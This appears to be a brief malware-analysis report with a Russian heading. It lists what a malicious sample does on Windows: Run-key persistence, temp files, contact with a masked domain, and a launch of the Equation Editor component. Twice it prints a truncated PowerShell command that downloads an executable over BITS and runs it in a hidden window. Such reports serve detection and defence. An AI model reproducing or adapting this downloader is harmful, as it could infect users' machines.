Техническая информация
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\Run] 'MyApp' = '%APPDATA%\MyApp\MyApp.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$HSH=$env:temp+'\yYV.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://am##ai.org/admin/_outputAE3F68F.exe' -Destination $HSH;(New-Object -com Shell.Applicat...
- yyv.exe
- %TEMP%\bit2e18.tmp
- %TEMP%\bit47ea.tmp
- %APPDATA%\myapp\myapp.exe
- %TEMP%\bit2e18.tmp
- %TEMP%\bit47ea.tmp
- %TEMP%\bit47ea.tmp в %TEMP%\yyv.exe
- %TEMP%\bit2e18.tmp в %TEMP%\yyv.exe
- 'am##ai.org':80
- http://am##ai.org/admin/_outputAE3F68F.exe
- DNS ASK am##ai.org
- '%TEMP%\yyv.exe'
- '%WINDIR%\syswow64\cmd.exe' /c PowerShell "try{$HSH=$env:temp+'\yYV.exe';Import-Module BitsTransfer;Start-BitsTransfer -Source 'http://am##ai.org/admin/_outputAE3F68F.exe' -Destination $HSH;(New-Object -com Shell.Applicat...' (со скрытым окном)
- '%CommonProgramFiles%\microsoft shared\equation\eqnedt32.exe' -Embedding